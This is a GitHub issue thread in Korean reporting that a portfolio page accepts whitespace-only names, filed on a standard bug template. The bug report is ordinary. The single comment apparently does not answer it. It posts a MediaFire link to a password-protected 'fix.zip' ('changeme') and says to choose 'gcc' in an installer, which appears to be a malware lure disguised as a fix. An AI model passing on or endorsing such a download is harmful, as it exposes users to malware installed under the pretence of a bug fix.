### ISSUE TITLE
[PC-Chrome-1920-포트폴리오 페이지] 포트폴리오 이름으로 공백만 입력 가능한 문제

### ISSUE THREAD

**Issue by sngbmYu** [100-hours-a-week/5-team-HRTH-ustock-fe#122]
##  버그 설명

버그에 대한 명확하고 간결한 설명해주세요.

- 포트폴리오 이름으로 공백(" ")을 입력해도 정상적으로 포트폴리오가 생성되는 문제

## 재현하는 방법

동작을 재현하는 단계:

1. 포트폴리오 생성 페이지로 이동
2. 포트폴리오를 생성할 때 이름에 공백을 입력
3. 포트폴리오가 정상적으로 생성

## 예상한 동작

예상했던 일에 대한 명확하고 간결한 설명해주세요.

- 공백을 입력하면 걸러내야 함

## 스크린샷 (옵션)

문제를 설명하는 데 도움이 되는 스크린샷을 추가하세요. 스크린샷으로 어렵다면 영상첨부해주세요.

## 데스크톱(다음 정보를 작성해 주세요):

- OS: [예) iOS]
- Browser [예) chrome, safari]
- Version [예) 22]

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
